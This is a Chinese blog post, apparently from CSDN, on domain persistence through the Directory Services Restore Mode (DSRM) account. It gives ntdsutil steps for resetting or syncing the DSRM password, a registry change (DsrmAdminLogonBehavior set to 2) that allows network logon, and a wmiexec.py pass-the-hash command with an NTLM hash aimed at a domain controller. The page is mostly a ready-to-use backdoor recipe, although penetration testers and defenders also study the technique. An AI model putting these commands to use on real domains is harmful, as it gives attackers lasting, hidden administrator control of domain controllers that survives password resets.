域权限维持-DSRM

简介

除了krbtgt服务帐号外,域控上还有个可利用的账户:目录服务还原模式(DSRM)账户,这个密码是在DC安装的时候设置的,所以一般不会被修改。但是微软对DSRM帐号进行了限制,只允许在控制台登录。可以通过修改注册表的方式,将如下注册表键值: HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior 中的DSRMAdminLogonBehavior改为2,就可以通过网络验证并登录到DC。这样DSRM账户就可以看做一个本地管理员帐号。可以通过导出的HASH结合PTH方式,持续控制DC,即使域内用户密码都进行了修改也可以利用。

更改DSRM密码的方式

通过明文指定

ntdsutil  
set dsrm password 
reset password on server null 
<PASSWORD> #Zz1234.
q
q

在这里插入图片描述

通过域账户同步

ntdsutil 
set dsrm password 
sync from domain account <your user here>
q
q
# Qq1234.

在这里插入图片描述

DSRM利用

这里的DSRM相当于一个本地账户
在更改时只是更改了sam数据库

使用DSRM账户连接的前提

(1)系统要求:在安装了KB961320补丁的Windows Server 2008及之后的Windows Server版本开始支持在DC上使用指定的域帐户同步DSRM密码
(2)更改DSRM的密码方式:同步域用户的方式
(3)开启支持DSRM账户网络连接:需要修改注册表项,默认没有改项

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2

powershell

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType "DWORD"

需要一个域账户的hash
并且需要注意是否会同步域账户(同步dsrm账户后,后门即失效)
域控重启后会失效

使用psexec或者wmiexec进行链接

wmiexec.py dc/administrator@192.168.164.129 -hashes :aa4390bb75acbd6230d5467c1a2a466e
# 机器名/用户@ip ntlmhash

在这里插入图片描述
sam
在这里插入图片描述
域用户
在这里插入图片描述

参考文章

tangsan/e488a4cdd773
https://www.freebuf.com/articles/system/80968.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值